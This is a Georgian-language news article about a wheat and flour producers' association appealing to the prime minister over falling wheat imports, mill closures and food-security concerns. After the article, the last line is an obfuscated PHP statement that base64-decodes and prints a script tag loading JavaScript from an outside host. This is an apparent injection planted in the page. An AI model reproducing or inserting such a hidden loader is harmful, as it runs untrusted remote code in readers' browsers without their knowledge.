celsiusi
ავერსი საქკაბელი
ხორბლისა და ფქვილის მწარმოებელთა ასოციაცია გასული წლის ივნისის შემდეგ ხორბლის იმპორტის კლების პრობლემის გადასაჭრელად პრემიერს და მინისტრებს მიმართავს. ამის შესახებ BM.GE-ის ხორბლისა და ფქვილის მწარმოებელთა ასოციაციის აღმასრულებელმა დირექტორმა ლევან სილაგავამ განუცხადა.
 
საქმე ის, არის რომ ხორბლის იმპორტიორები და ფქვილის მწარმოებლების რუსეთში გასული წლის ივნისში ხორბლის ექსპორტზე გადასახადის დაწესების შემდეგ, სექტემბრიდან ხორბლის იმპორტის შემცირებაზე და აქედან გამომდინარე შესაძლო პრობლემებზე ალაპარაკდნენ. ისინი ხორბლის მარაგების შემცირების გამო ქვეყნისთვის სასურსათო უსაფრთხოების შემცირებას და ადგილობრივი წარმოებების - წისქვილკომბინატების გაჩერებას მთავარ გამოწვევად ასახელებდნენ, რის გამოც სამი უწყების - ეკონომიკის, ფინანსთა და სოფლის მეურნეობის მინისტრების მოადგილეების დონეზე ხორბლის იმპორტის შემცირების საკითხის გადასაჭრელად უწყებათშორისი კომისია შეიქმნა. დღეს კი ლევან სილაგავა BM.GE-სთან აცხადებს, რომ კომისიამ თავისი თავი ამოწურა და რეალური გადაწყვეტილებები ვერ მიიღო. მისი ინფორმაციით, დღეისთვის 10 მცირე წისქვილკომბინატი უკვე დახურულია და იმ შემთხვევაში თუ ხორბლის იმპორტის პრობლემა არ მოგვარდება, მსხვილი წისქვილკომბინატებიც ფქვილის იმპორტზე გადავლენ.
 
ხორბლისა და ფქვილის მწარმოებელთა ასოციაცია პრემიერთან შეხვედრას გეგმავს და მინისტრთა კაბინეტისგან კონკრეტული ნაბიჯების გადადგმას ელის.
 
„სამწუხაროდ, სამმხრივმა უწყებათშორისმა კომისიამ ვერანაირი შედეგი ვერ დადო. ეკონომიკის, ფინანსთა და სოფლის მეურნეობის მინისტრების მოადგილეების დონე, ალბათ ის დონე არ არის, რომელიც გადაწყვეტილების მიღებას შეძლებს და ერთ წრეზე ვტრიალებთ. ისინი გვეუბნებიან, რომ საქართველოსა და მსოფლიო სავაჭრო ორგანიზაციის შორის არსებული ხელშეკრულება სატარიფო გადაწყვეტილების მიღების საშუალებას არ აძლევს, თუმცა მსოფლიო სავაჭრო ორგანიზაციის წესდებაში წერია, რომ შიდა ბაზრის დასაცავად უპირატესად ტარიფული მეთოდების გამოყენება და არა რაოდენობრივი და სხვა ტექნიკური ბარიერების დაწესება შესაძლებელია. ცოტა გასაკვირია ეკონომიკის სამინისტროს პოზიცია, როდესაც პრობლემის აღქმა აქვთ, მაგრამ იმეორებენ, რომ არაფრის გაკეთება არ შეუძლიათ. ვფიქრობთ, რომ ამ კომისიამ თავისი თავი ამოწურა.
 
ჩვენი უპირატესი ამოცანა უახლოეს პერიოდში პრემიერთან და უწყებების პირველ პირებთან, ერთობლივად დაჯდომა და სასურსათო უსაფრთხოების უზრუნველსაყოფად და წისქვილკომბინატების გაჩერების საკითხის გადაწყვეტაა. რა საფრთხის წინაშე ვდგავართ ამის აღქმა უნდა იყოს, მაგრამ ალბათ საახალწლო პერიოდმა და პოლიტიკურმა პროცესებმა ეს საკითხი უკან გადაწია, შესაბამისად, უახლოეს მომავალში პრემიერთან უშუალო შეხვედრის მოთხოვნით გავაქტიურდებით, რათა მისგან და რამდენიმე უწყების ხელმძღვანელისგან ამ საკითხთან მიმართებით მკაფიო პასუხი მივიღოთ. ხორბლის იმპორტის შემცირება და ფქვილის იმპორტის ზრდა, შემდეგში პურის ფასსაც დაარტყამს“, - აცხადებს ლევან სილაგავა.
 
მისი ინფორმაციით, ივნისის შემდეგ გასული წლის დეკემბერში ხორბლის იმპორტის ანტირეკორდი დაფიქსირდა, რა დროსაც ქვეყანაში მხოლოდ 6 000 ტონა ხორბალი შემოვიდა, მაშინ როდესაც 2020-2019 წლების დეკემბერში 30 და 60 ათასი ტონა შემოდიოდა. ამავე დროს კი ფქვილის იმპორტი იმდენად გაზრდილია, რომ გასული წლის ივნის-დეკემბერში საქართველო რუსეთისთვის მთავარი საიმპორტო ქვეყანა გახდა და ჩინეთი ჩაანაცვლა. ლევან სილაგავა აღნიშნავს, რომ ქვეყანაში ხორბლის მარაგები მინიმუმზეა, ხოლო ფქვილის მარაგების შექმნა ვერ ხდება.
 
წყარო: BMG
979
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");